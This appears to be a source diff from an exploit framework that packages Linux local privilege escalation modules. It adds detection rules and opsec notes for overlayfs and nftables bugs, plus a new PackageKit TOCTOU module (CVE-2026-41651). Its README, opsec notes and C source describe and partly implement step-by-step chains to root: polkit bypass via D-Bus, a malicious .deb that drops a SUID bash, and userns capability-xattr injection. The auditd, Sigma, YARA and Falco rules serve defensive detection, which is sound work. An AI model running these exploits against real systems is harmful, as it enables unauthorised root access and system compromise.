+    .detect_falco   = nft_set_uaf_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + single nfnetlink transaction: NEWTABLE + NEWCHAIN + NEWSET (anonymous, ANONYMOUS|CONSTANT|EVAL) + NEWRULE with nft_lookup referencing the anon set + DELSET + DELRULE. Vulnerable kernels do not deactivate the lookup's set ref on commit -> UAF when set frees. msg_msg cg-512 spray (32 queues x 16 msgs, tag 'SKELETONKEY_SET'). --full-chain re-fires with forged headers (data ptr = kaddr) and NEWSETELEM payload. Writes /tmp/skeletonkey-nft_set_uaf.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + msgsnd. Dmesg: KASAN oops on UAF. Cleanup unlinks log.",
 };

 void skeletonkey_register_nft_set_uaf(void)
@@ -37,13 +37,17 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <sched.h>
 #include <sys/mount.h>
@@ -129,10 +133,18 @@ static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)

    /* Ubuntu-specific bug. Non-Ubuntu kernels are largely immune
     * because upstream didn't enable the userns-mount path until
-     * 5.11. Bail early for non-Ubuntu. */
-    if (!is_ubuntu()) {
+     * 5.11. Bail early for non-Ubuntu. Consult the shared host
+     * fingerprint (distro_id == "ubuntu" — populated once at startup;
+     * the local is_ubuntu() helper is preserved for symmetry / future
+     * standalone use but the dispatcher path goes through ctx->host). */
+    bool ubuntu = ctx->host
+        ? (strcmp(ctx->host->distro_id, "ubuntu") == 0)
+        : is_ubuntu();
+    if (!ubuntu) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] overlayfs: not Ubuntu — bug is Ubuntu-specific\n");
+            fprintf(stderr, "[+] overlayfs: not Ubuntu (distro=%s) — bug is "
+                "Ubuntu-specific\n",
+                ctx->host ? ctx->host->distro_id : "?");
        }
        return SKELETONKEY_OK;
    }
@@ -180,7 +192,7 @@ static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)
     * Ubuntu fix is per-release-specific; conservatively report
     * VULNERABLE if version < 5.13 (covers most affected Ubuntu LTS),
     * and recommend --active for confirmation. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 13)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 13, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[!] overlayfs: Ubuntu kernel %s in vulnerable range — "
                            "re-run with --active to confirm\n", v.release);
@@ -446,6 +458,28 @@ fail_workdir:
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: overlayfs / unshare(CLONE_NEWUSER|CLONE_NEWNS) /
+ * setxattr("security.capability") are all Linux-only. Stub out so the
+ * module still registers and the top-level `make` completes on
+ * macOS/BSD dev boxes. */
+static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] overlayfs: Linux-only module "
+                "(Ubuntu userns-overlayfs) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] overlayfs: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ----- Embedded detection rules ----- */

 static const char overlayfs_auditd[] =
@@ -456,6 +490,56 @@ static const char overlayfs_auditd[] =
    "# Watch for security.capability xattr writes (the post-mount step)\n"
    "-a always,exit -F arch=b64 -S setxattr,fsetxattr,lsetxattr -k skeletonkey-overlayfs-cap\n";

+static const char overlayfs_sigma[] =
+    "title: Possible CVE-2021-3493 Ubuntu overlayfs capability injection\n"
+    "id: f78a01e6-skeletonkey-overlayfs\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects Ubuntu's overlayfs-in-userns capability-xattr injection:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount('overlay') + setxattr\n"
+    "  with name 'security.capability'. The bug lets caps set inside\n"
+    "  userns persist on the host fs. False positives: legitimate\n"
+    "  rootless container image builds; correlate with subsequent\n"
+    "  execve of the modified binary.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:   {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  overlay:  {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  setcap:   {type: 'SYSCALL', syscall: 'setxattr'}\n"
+    "  condition: userns and overlay and setcap\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.3493]\n";
+
+static const char overlayfs_yara[] =
+    "rule overlayfs_cve_2021_3493 : cve_2021_3493 userns_lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-3493\"\n"
+    "        description = \"Ubuntu overlayfs userns workdir + security.capability xattr injection\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work    = /\\/tmp\\/skeletonkey-ovl-[A-Za-z0-9]+/\n"
+    "        $xattr   = \"security.capability\" ascii\n"
+    "    condition:\n"
+    "        $work and $xattr\n"
+    "}\n";
+
+static const char overlayfs_falco[] =
+    "- rule: overlayfs mount + setxattr(security.capability) in userns\n"
+    "  desc: |\n"
+    "    Non-root process inside userns mounts overlayfs and writes a\n"
+    "    security.capability xattr on a binary in the upper layer.\n"
+    "    The xattr persists on the host fs (CVE-2021-3493, Ubuntu).\n"
+    "    False positives: rootless container image builds.\n"
+    "  condition: >\n"
+    "    evt.type = setxattr and not user.uid = 0 and\n"
+    "    evt.args contains security.capability\n"
+    "  output: >\n"
+    "    setxattr(security.capability) by non-root\n"
+    "    (user=%user.name pid=%proc.pid file=%fd.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2021.3493]\n";
+
 const struct skeletonkey_module overlayfs_module = {
    .name           = "overlayfs",
    .cve            = "CVE-2021-3493",
@@ -468,9 +552,10 @@ const struct skeletonkey_module overlayfs_module = {
    .cleanup        = NULL,    /* exploit cleans up its own workdir on failure;
                                * on success, exec replaces us so cleanup-by-us doesn't apply */
    .detect_auditd  = overlayfs_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = overlayfs_sigma,
+    .detect_yara    = overlayfs_yara,
+    .detect_falco   = overlayfs_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) for CAP_SYS_ADMIN; mount('overlay', merged, ...); compile + copy payload into the merged dir (writes upper on host fs); setxattr(upper_payload, 'security.capability', cap_setuid+ep) - the bug is that this xattr persists on the HOST fs despite being set inside userns. Parent then execve's the now-CAP_SETUID payload, calls setuid(0), execs /bin/sh. Artifacts: /tmp/skeletonkey-ovl-XXXXXX/ workdir; cleaned on exit/failure (on success the exec replaces the process so cleanup does not run). Audit-visible via unshare + mount(overlay) + setxattr(security.capability) + execve of attacker-controlled binary. Dmesg silent.",
 };

 void skeletonkey_register_overlayfs(void)
@@ -40,14 +40,18 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include <stdint.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -56,6 +60,7 @@
 #include <sys/wait.h>

 static const struct kernel_patched_from overlayfs_setuid_patched_branches[] = {
+    {5, 10, 179},   /* 5.10.x stable backport (per Debian tracker — bullseye) */
    {5, 15, 110},
    {6,  1,  27},
    {6,  2,  13},
@@ -68,18 +73,10 @@ static const struct kernel_range overlayfs_setuid_range = {
                      sizeof(overlayfs_setuid_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
+/* The unprivileged-userns precondition is now read from the shared
+ * host fingerprint (ctx->host->unprivileged_userns_allowed), which
+ * probes once at startup via core/host.c. The previous per-detect
+ * fork-probe helper was removed. */

 static const char *find_setuid_in_lower(void)
 {
@@ -98,39 +95,43 @@ static const char *find_setuid_in_lower(void)

 static skeletonkey_result_t overlayfs_setuid_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] overlayfs_setuid: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] overlayfs_setuid: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.11 when ovl copy-up was generalized.
     * Pre-5.11 immune via a different code path. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 11)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 11, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: kernel %s predates the bug "
-                            "(introduced in 5.11)\n", v.release);
+                            "(introduced in 5.11)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&overlayfs_setuid_range, &v);
+    bool patched = kernel_range_is_patched(&overlayfs_setuid_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] overlayfs_setuid: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] overlayfs_setuid: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] overlayfs_setuid: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] overlayfs_setuid: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] overlayfs_setuid: user_ns+mount_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -197,7 +198,10 @@ static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ct
        fprintf(stderr, "[-] overlayfs_setuid: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] overlayfs_setuid: already root\n");
        return SKELETONKEY_OK;
    }
@@ -371,12 +375,88 @@ static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ct
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: overlayfs copy-up / unshare(CLONE_NEWUSER|CLONE_NEWNS)
+ * / mount("overlay", ...) are Linux-only. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t overlayfs_setuid_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] overlayfs_setuid: Linux-only module "
+                "(overlayfs setuid copy-up) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] overlayfs_setuid: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char overlayfs_setuid_auditd[] =
    "# overlayfs setuid copy-up (CVE-2023-0386) — auditd detection rules\n"
    "# Same surface as CVE-2021-3493; share the skeletonkey-overlayfs key.\n"
    "-a always,exit -F arch=b64 -S mount -F a2=overlay -k skeletonkey-overlayfs\n"
    "-a always,exit -F arch=b64 -S chown,fchown,fchownat -k skeletonkey-overlayfs-chown\n";

+static const char overlayfs_setuid_sigma[] =
+    "title: Possible CVE-2023-0386 overlayfs setuid copy-up\n"
+    "id: 0891b2f7-skeletonkey-overlayfs-setuid\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the upstream overlayfs setuid copy-up bug: unshare\n"
+    "  (CLONE_NEWUSER|CLONE_NEWNS) + mount('overlay') with a setuid-\n"
+    "  root binary in lower + chown on the merged view to trigger\n"
+    "  copy-up. Setuid bit persists in upper layer despite\n"
+    "  unprivileged ownership.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  overlay:   {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  chown_up:  {type: 'SYSCALL', syscall: 'chown'}\n"
+    "  condition: userns and overlay and chown_up\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0386]\n";
+
+static const char overlayfs_setuid_yara[] =
+    "rule overlayfs_setuid_cve_2023_0386 : cve_2023_0386 userns_lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-0386\"\n"
+    "        description = \"overlayfs setuid copy-up workdir signature\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work = /\\/tmp\\/skeletonkey-ovlsu-[A-Za-z0-9]+/\n"
+    "    condition:\n"
+    "        $work\n"
+    "}\n";
+
+static const char overlayfs_setuid_falco[] =
+    "- rule: overlayfs chown on setuid binary in userns (copy-up)\n"
+    "  desc: |\n"
+    "    Non-root chown on a setuid-root binary inside an overlayfs\n"
+    "    mount in a userns. Triggers copy-up that preserves the\n"
+    "    setuid bit despite unprivileged upper-layer ownership.\n"
+    "    CVE-2023-0386.\n"
+    "  condition: >\n"
+    "    evt.type in (chown, fchown, fchownat) and not user.uid = 0\n"
+    "    and (fd.name in (/usr/bin/su, /bin/su, /usr/bin/sudo,\n"
+    "                     /usr/bin/passwd, /usr/bin/pkexec)\n"
+    "         or fd.name endswith /su)\n"
+    "  output: >\n"
+    "    chown on setuid binary by non-root\n"
+    "    (user=%user.name pid=%proc.pid file=%fd.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2023.0386]\n";
+
 const struct skeletonkey_module overlayfs_setuid_module = {
    .name           = "overlayfs_setuid",
    .cve            = "CVE-2023-0386",
@@ -388,9 +468,10 @@ const struct skeletonkey_module overlayfs_setuid_module = {
    .mitigate       = NULL,
    .cleanup        = overlayfs_setuid_cleanup,
    .detect_auditd  = overlayfs_setuid_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = overlayfs_setuid_sigma,
+    .detect_yara    = overlayfs_setuid_yara,
+    .detect_falco   = overlayfs_setuid_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) + overlayfs mount with a setuid-root binary in lower (e.g. /usr/bin/su); chown on the merged view triggers copy-up that preserves the setuid bit in upper - but upper is owned by the unprivileged user. Overwrites upper-layer contents with attacker payload and execve's for root. Artifacts: /tmp/skeletonkey-ovlsu-XXXXXX/ (workdir with payload.c, binary, overlay mounts); cleanup callback removes these. Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount(overlay) + chown on the merged view. No network. Dmesg silent on success.",
 };

 void skeletonkey_register_overlayfs_setuid(void)
@@ -0,0 +1,72 @@
+# pack2theroot — CVE-2026-41651
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public Vozec PoC.
+> **Not yet validated end-to-end on a vulnerable host** — see
+> _Verification status_.
+
+## Summary
+
+Pack2TheRoot is a userspace LPE in the **PackageKit** daemon
+(`packagekitd`), the cross-distro package-management D-Bus abstraction
+layer shipped on virtually every desktop and most modern server Linux
+distros (Ubuntu, Debian, Fedora, Rocky/RHEL via Cockpit, openSUSE…).
+
+Three cooperating bugs in `src/pk-transaction.c` chain into a TOCTOU
+window between polkit authorisation and dispatch. **The exploit needs
+no GUI session, no special permissions, and no polkit prompt** —
+GLib's D-Bus-vs-idle priority ordering makes it deterministic, not a
+timing race.
+
+```
+1. InstallFiles(SIMULATE, dummy.deb)        ← polkit bypassed; idle queued
+2. InstallFiles(NONE,    payload.deb)        ← cached_flags overwritten
+3. GLib idle fires → pk_transaction_run()    ← reads payload.deb + NONE
+   → dpkg runs postinst as root → SUID bash → root shell
+```
+
+The payload `.deb` is built entirely in C inside the module
+(ar / ustar / gzip-stored, no external `dpkg-deb` dependency).
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks Debian/Ubuntu host, system D-Bus accessible, `org.freedesktop.PackageKit` registered, and reads `VersionMajor/Minor/Micro` from the daemon. Returns VULNERABLE only when the version falls in `1.0.2 ≤ V ≤ 1.3.4`. The fix release (1.3.5, commit `76cfb675`, 2026-04-22) is pinned. |
+| `--exploit … --i-know` | Builds the two `.deb`s in `/tmp`, fires the two `InstallFiles` D-Bus calls back-to-back, polls up to 120s for `/tmp/.suid_bash` to appear, then `execv`s it for an interactive root shell. `--no-shell` stops after the SUID bash lands. |
+| `--cleanup` | Removes the staged `.deb` files; best-effort `unlink(/tmp/.suid_bash)` (the file is root-owned — needs root to remove); best-effort `sudo -n dpkg -r` the installed staging packages. |
+| `--detect-rules` | Emits embedded auditd + sigma rules covering the file-side footprint (the D-Bus call itself isn't auditable without bus monitoring). |
+
+## Preconditions
+
+- Linux + Debian/Ubuntu (the PoC's built-in `.deb` builder is
+  Debian-family only; RHEL/Fedora ports would need an `.rpm` builder).
+- PackageKit daemon registered on the system bus.
+- PackageKit version in `[1.0.2, 1.3.4]`.
+- Module built with `libglib2.0-dev` available (the top-level Makefile
+  autodetects `gio-2.0` via `pkg-config`; the module compiles as a
+  stub returning `PRECOND_FAIL` when GLib is absent).
+
+## Side-effect notes
+
+The exploit installs a malicious `.deb` (registered in dpkg's database
+as `skeletonkey-p2tr-payload`) and drops `/tmp/.suid_bash`. Both are
+intentionally visible — this is an authorised-testing tool, not a
+covert toolkit. Run `--cleanup` (preferably as root) before leaving
+the host.
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/Vozec/CVE-2026-41651> into the SKELETONKEY module
+interface. It has **not** been validated end-to-end against a known-
+vulnerable PackageKit host inside the SKELETONKEY CI matrix.
+
+Unlike the page-cache modules, `detect()` here is high-confidence:
+the fix release is officially pinned and the version is read directly
+from the daemon over D-Bus, so a `VULNERABLE` verdict is grounded in
+upstream's own version metadata rather than a heuristic.
+
+**Before promoting to 🟢:** validate the trigger end-to-end on a
+Debian/Ubuntu host with PackageKit ≤ 1.3.4 (the Vozec repo ships a
+Dockerfile that builds PackageKit 1.3.4 from source — that is the
+recommended bench).
@@ -0,0 +1,53 @@
+# NOTICE — pack2theroot
+
+## Vulnerability
+
+**CVE-2026-41651** — Pack2TheRoot. PackageKit TOCTOU local privilege
+escalation in `src/pk-transaction.c`: two cooperating bugs allow
+`cached_transaction_flags` and `cached_full_paths` to be overwritten
+between polkit authorisation and dispatch, and a third bug causes the
+dispatcher to read those cached values at fire time rather than at
+authorisation time. GLib's D-Bus-vs-idle priority ordering makes the
+overwrite deterministic, not a timing race.
+
+CVSS 8.1. Affects PackageKit `1.0.2` through `1.3.4` (over a decade
+of releases). Fixed in **PackageKit 1.3.5** (upstream commit
+`76cfb675`, 2026-04-22).
+
+## Research credit
+
+Discovered and disclosed by the **Deutsche Telekom security team**.
+
+> Telekom advisory: <https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html>
+> Upstream advisory: <https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv>
+
+The standalone proof-of-concept exploit the SKELETONKEY module is
+ported from is by **Vozec**:
+
+> Reference PoC: <https://github.com/Vozec/CVE-2026-41651>
+
+The Vozec repository carries no `LICENSE` file at the time of porting;
+the SKELETONKEY-distributed `skeletonkey_modules.c` is original
+SKELETONKEY-licensed code (MIT) that reproduces the PoC's deb-builder
+(ar / ustar / gzip-stored) and D-Bus call sequence. Independent
+research credit belongs to the people above.
+
+A CTF-style lab by **dinosn** (Dockerised PackageKit 1.3.4 build with
+the exploit pre-set) is a useful reference bench:
+
+> CTF lab: <https://github.com/dinosn/pack2theroot-lab>
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` wraps the PoC in the standard
+`skeletonkey_module` detect / exploit / cleanup interface, adds the
+embedded auditd + sigma rules, and reads PackageKit's
+`VersionMajor/Minor/Micro` D-Bus properties so `detect()` can give a
+high-confidence verdict (the fix release 1.3.5 is officially pinned —
+no version-fabrication caveat).
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable host.** See
+`MODULE.md` for the recommended verification path (Vozec's Dockerised
+PackageKit-1.3.4 bench).
@@ -0,0 +1,28 @@
+# Pack2TheRoot (CVE-2026-41651) — auditd detection rules
+#
+# PackageKit TOCTOU LPE: two back-to-back InstallFiles D-Bus calls
+# install a malicious .deb as root, whose postinst drops a SUID bash
+# in /tmp. The D-Bus traffic itself is not auditable without bus
+# monitoring (dbus-monitor / dbus-broker logs), so these rules cover
+# the file-side footprint.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# The exact SUID payload path the published PoC lands
+-w /tmp/.suid_bash -p wa -k skeletonkey-pack2theroot
+
+# Any setuid bit set on /tmp/.suid_bash by anyone
+-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat \
+    -F path=/tmp/.suid_bash -k skeletonkey-pack2theroot-suid
+
+# The PoC drops two .deb files in /tmp immediately before the install
+-a always,exit -F arch=b64 -S openat,creat \
+    -F dir=/tmp -F success=1 -k skeletonkey-pack2theroot-deb
+
+# packagekitd-driven dpkg/apt activity initiated by a non-root caller
+-a always,exit -F arch=b64 -S execve -F path=/usr/bin/dpkg \
+    -F auid!=0 -k skeletonkey-pack2theroot-dpkg
+-a always,exit -F arch=b64 -S execve -F path=/usr/bin/apt-get \
+    -F auid!=0 -k skeletonkey-pack2theroot-apt
@@ -0,0 +1,32 @@
+title: Possible Pack2TheRoot exploitation (CVE-2026-41651)
+id: 3f2b8d54-skeletonkey-pack2theroot
+status: experimental
+description: |
+  Detects the file-side footprint of Pack2TheRoot (CVE-2026-41651): a
+  non-root user triggers PackageKit InstallFiles, dpkg runs a postinst
+  that drops /tmp/.suid_bash (a setuid bash), and a privileged shell
+  follows. The trigger itself is two back-to-back D-Bus calls with no
+  polkit prompt — only visible via dbus-monitor or the file side
+  effects flagged below.
+references:
+  - https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html
+  - https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv
+  - https://github.com/Vozec/CVE-2026-41651
+logsource:
+  product: linux
+  service: auditd
+detection:
+  suid_drop:
+    type: 'PATH'
+    name|startswith:
+      - '/tmp/.suid_bash'
+      - '/tmp/.pk-payload-'
+      - '/tmp/.pk-dummy-'
+  not_root:
+    auid|expression: '!= 0'
+  condition: suid_drop and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.41651
@@ -0,0 +1,799 @@
+/*
+ * pack2theroot_cve_2026_41651 — SKELETONKEY module
+ *
+ * Pack2TheRoot (CVE-2026-41651) — PackageKit TOCTOU LPE.
+ *
+ * Three cooperating bugs in PackageKit's `src/pk-transaction.c`:
+ *   BUG 1  InstallFiles() stores cached_transaction_flags and
+ *          cached_full_paths unconditionally, with no state guard.
+ *   BUG 2  pk_transaction_set_state() silently rejects backward
+ *          transitions (READY → WAITING_FOR_AUTH).
+ *   BUG 3  pk_transaction_run() reads the cached flags at dispatch
+ *          time, not at authorisation time.
+ *   BYPASS The SIMULATE flag skips polkit entirely.
+ *
+ * Two back-to-back async D-Bus InstallFiles() calls — first with
+ * SIMULATE (bypasses polkit, queues a GLib idle callback), then
+ * immediately with NONE + the malicious .deb (overwrites the cached
+ * flags/paths before the idle fires). GLib priority ordering makes
+ * this deterministic, not a timing race. postinst of the malicious
+ * .deb installs a SUID bash at /tmp/.suid_bash → root shell.
+ *
+ * This module is a faithful port of the public PoC by Vozec
+ * (github.com/Vozec/CVE-2026-41651); the deb-builder helpers
+ * (CRC-32, gzip-stored, tar entry, ar entry, build_deb) and the
+ * D-Bus call sequence are reproduced from that PoC. The original
+ * disclosure was by the Deutsche Telekom security team. See
+ * NOTICE.md.
+ *
+ * Build adaptation: the module requires GLib/GIO for D-Bus. The
+ * top-level Makefile autodetects gio-2.0 via pkg-config and defines
+ * PACK2TR_HAVE_GIO when present. When absent, the module compiles as
+ * a stub that returns PRECOND_FAIL with a build-time hint.
+ *
+ * Port adaptations vs. the standalone PoC:
+ *   - wrapped in the skeletonkey_module detect/exploit/cleanup interface
+ *   - exploit() runs the PoC body in a forked child so the PoC's
+ *     die()/exit() paths cannot tear down the skeletonkey dispatcher
+ *   - detect() does a passive precondition + version check (vulnerable
+ *     range 1.0.2 ≤ V ≤ 1.3.4, fixed in 1.3.5) — no version-only
+ *     fabrication; the fix release is officially pinned
+ *   - honours ctx->no_shell (build + fire the TOCTOU, do not spawn
+ *     the SUID bash shell)
+ *   - cleanup() removes the two /tmp .debs and best-effort-unlinks
+ *     /tmp/.suid_bash (which requires root since it is owned by root)
+ *
+ * VERIFICATION STATUS: ported, NOT yet validated end-to-end on a
+ * vulnerable PackageKit (1.3.4 or earlier) host. The fix release
+ * (1.3.5, commit 76cfb675, 2026-04-22) IS pinned.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+
+#if defined(__linux__) && defined(PACK2TR_HAVE_GIO)
+
+/* _GNU_SOURCE / _FILE_OFFSET_BITS are passed via -D in the top-level
+ * Makefile; do not redefine here. */
+#include "../../core/host.h"
+#include <stdint.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/file.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <time.h>
+#include <glib.h>
+#include <gio/gio.h>
+
+/* ── config ────────────────────────────────────────────────────────── */
+#define SUID_PATH     "/tmp/.suid_bash"
+#define PK_BUS        "org.freedesktop.PackageKit"
+#define PK_OBJ        "/org/freedesktop/PackageKit"
+#define PK_IFACE      "org.freedesktop.PackageKit"
+#define PK_TX_IFACE   "org.freedesktop.PackageKit.Transaction"
+#define FLAG_NONE     ((guint64)0)
+#define FLAG_SIMULATE ((guint64)(1u << 2))   /* SIMULATE bypasses polkit */
+
+/* Vulnerable range: PackageKit 1.0.2 ≤ V ≤ 1.3.4. Fixed in 1.3.5. */
+#define P2TR_VER(M,m,p) ((M)*10000 + (m)*100 + (p))
+#define P2TR_VER_LO     P2TR_VER(1,0,2)
+#define P2TR_VER_HI     P2TR_VER(1,3,4)
+
+static int p2tr_verbose = 1;
+#define LOG(fmt, ...) do { if (p2tr_verbose) \
+	fprintf(stderr, "[*] pack2theroot: " fmt "\n", ##__VA_ARGS__); } while (0)
+#define ERR(fmt, ...) fprintf(stderr, "[-] pack2theroot: " fmt "\n", ##__VA_ARGS__)
+
+/* ── CRC-32 (ISO 3309) — verbatim from V12 PoC ─────────────────────── */
+static uint32_t crc_tab[256];
+static void crc_init(void)
+{
+	for (unsigned i = 0; i < 256; i++) {
+		uint32_t c = i;
+		for (int j = 0; j < 8; j++) c = (c&1) ? (0xedb88320u ^ (c>>1)) : (c>>1);
+		crc_tab[i] = c;
+	}
+}
+static uint32_t crc32_iso(const void *src, size_t n)
+{
+	const uint8_t *p = src; uint32_t c = 0xffffffffu;
+	while (n--) c = crc_tab[(c ^ *p++) & 0xff] ^ (c >> 8);
+	return c ^ 0xffffffffu;
+}
+
+/* ── gzip stored deflate block (max 65535 B) ───────────────────────── */
+static size_t gzip_store(const void *src, size_t len, uint8_t *dst)
+{
+	if (len > 0xffff) return 0;
+	uint8_t *p = dst;
+	*p++ = 0x1f; *p++ = 0x8b; *p++ = 0x08; *p++ = 0x00;
+	p[0]=p[1]=p[2]=p[3]=0; p+=4; *p++ = 0x00; *p++ = 0xff;
+	uint16_t ln = len, nln = ~ln;
+	*p++ = 0x01; memcpy(p, &ln, 2); p += 2; memcpy(p, &nln, 2); p += 2;
+	memcpy(p, src, len); p += len;
+	uint32_t c = crc32_iso(src, len), s = (uint32_t)len;
+	memcpy(p, &c, 4); p += 4; memcpy(p, &s, 4); p += 4;
+	return p - dst;
+}
+
